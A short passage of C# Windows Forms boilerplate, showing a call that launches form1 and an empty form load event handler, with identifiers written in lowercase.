{
application.run(new form1());
}
private void form1_load(object sender, system.eventargs e)
{
}
}
}
